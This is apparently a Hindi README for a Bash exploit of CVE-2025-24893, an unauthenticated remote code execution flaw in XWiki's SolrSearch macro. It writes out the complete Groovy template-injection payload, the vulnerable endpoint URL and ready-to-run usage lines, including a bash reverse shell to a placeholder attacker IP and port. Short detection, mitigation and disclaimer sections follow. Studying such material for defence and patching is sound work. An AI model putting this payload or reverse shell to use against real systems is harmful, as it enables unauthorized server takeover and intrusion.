
CVE-2025-24893 के लिए Bash शोषण, XWiki Platform में SolrSearch मैक्रो के माध्यम से टेम्पलेट इंजेक्शन द्वारा एक अनप्रमाणित रिमोट कोड निष्पादन भेद्यता।
यह स्क्रिप्ट CVE-2025-24893 से प्रभावित XWiki Platform संस्करणों को लक्षित करने वाले एक शोषण का पुनर्निर्मित Bash कार्यान्वयन है। यह SolrSearch मैक्रो में टेम्पलेट इंजेक्शन दोष के माध्यम से अनधिकृत दूरस्थ कोड निष्पादन कमजोरी का लाभ उठाता है, जो हमलावरों को मनमाना Groovy कोड निष्पादित करने की अनुमति देता है।
मूल Python शोषण कार्यान्वयन विभिन्न सुरक्षा शोधकर्ताओं द्वारा बनाए गए थे और यहाँ Bash उपयोगकर्ताओं के लिए सरलीकृत निष्पादन और बेहतर उपयोगिता के साथ अनुकूलित किए गए हैं।
text पैरामीटर में उपयोगकर्ता-आपूर्त इनपुट को ठीक से मान्य और सैनिटाइज़ करने में विफल रहता है, जिससे हमलावर बिना प्रमाणीकरण के रेंडरिंग पाइपलाइन में दुर्भावनापूर्ण Groovy कोड इंजेक्ट कर सकते हैं।curl: HTTP अनुरोध भेजने के लिए।jq: पेलोड को URL-एन्कोड करने के लिए।निष्पादन अनुमतियाँ प्रदान करें:
chmod +x CVE-2025-24893
स्क्रिप्ट को आवश्यक तर्कों के साथ चलाएँ:
./CVE-2025-24893 <target_url> <command>
| पैरामीटर | विवरण |
|---|---|
<target_url> | लक्ष्य XWiki URL (जैसे, http://example.com या https://xwiki.example.org)। प्रोटोकॉल वैकल्पिक है। |
<command> | लक्ष्य सर्वर पर निष्पादित करने के लिए सिस्टम कमांड। |
जाँचें कि लक्ष्य कमजोर है या नहीं (id कमांड निष्पादित करें):
./CVE-2025-24893 http://vulnerable-xwiki.example.com "id"
सिस्टम जानकारी प्राप्त करें:
./CVE-2025-24893 http://vulnerable-xwiki.example.com "uname -a"
परीक्षण फ़ाइल बनाएँ:
./CVE-2025-24893 http://vulnerable-xwiki.example.com "touch /tmp/pwned"
रिवर्स शेल (अपना IP और पोर्ट डालें):
./CVE-2025-24893 http://vulnerable-xwiki.example.com "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"
कमांड-लाइन तर्क पार्सिंग:
http:// जोड़कर URL को सामान्यीकृत करता है।पेलोड निर्माण:
.execute() का उपयोग करके निर्दिष्ट कमांड को निष्पादित करता है।}}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}URL एन्कोडिंग:
jq का उपयोग करके पेलोड को URL-एन्कोड करता है।शोषण:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=<encoded_payload>शोषण श्रृंखला निम्नानुसार काम करती है:
}}}{{async async=false}}{{groovy}}'<command>'.execute();{{/groovy}}{{/async}}
}}} - किसी भी मौजूदा मैक्रो संदर्भ को बंद करता है{{async async=false}} - समकालिक निष्पादन सुनिश्चित करता है{{groovy}}...{{/groovy}} - दुर्भावनापूर्ण Groovy कोड को लपेटता है'<command>'.execute(); - निर्दिष्ट सिस्टम कमांड को निष्पादित करता हैपरीक्षण उद्देश्यों के लिए, आप Docker का उपयोग करके एक कमजोर XWiki इंस्टेंस सेट कर सकते हैं:
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10
# XWiki शुरू होने तक प्रतीक्षा करें (1-2 मिनट लग सकते हैं)
./CVE-2025-24893 http://localhost:8080 "whoami"
इस कमजोरी के सफल शोषण से एक अनधिकृत हमलावर निम्नलिखित कर सकता है:
CISA और कई सुरक्षा विक्रेताओं के अनुसार:
SolrSearch एंडपॉइंट पर संदिग्ध अनुरोधों की निगरानी करें:
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*
निम्नलिखित पैटर्न वाले अनुरोधों पर ध्यान दें:
{{groovy}}{{async}}.execute()/tmp या अन्य लिखने योग्य निर्देशिकाओं में नई फ़ाइलेंXWiki अपग्रेड करें पैच किए गए संस्करण पर:
अस्थायी वर्कअराउंड लागू करें (यदि तत्काल पैचिंग संभव नहीं है):
समझौते की निगरानी करें:
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। जिम्मेदारी से उपयोग करें।
परीक्षण से पहले आपके पास सिस्टम स्वामी से स्पष्ट लिखित अनुमति होनी चाहिए।
इस उपकरण के लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। उपयोगकर्ता यह सुनिश्चित करने के लिए पूरी तरह से जिम्मेदार हैं कि उनके पास उचित प्राधिकरण है और वे सभी लागू कानूनों और विनियमों का पालन करते हैं।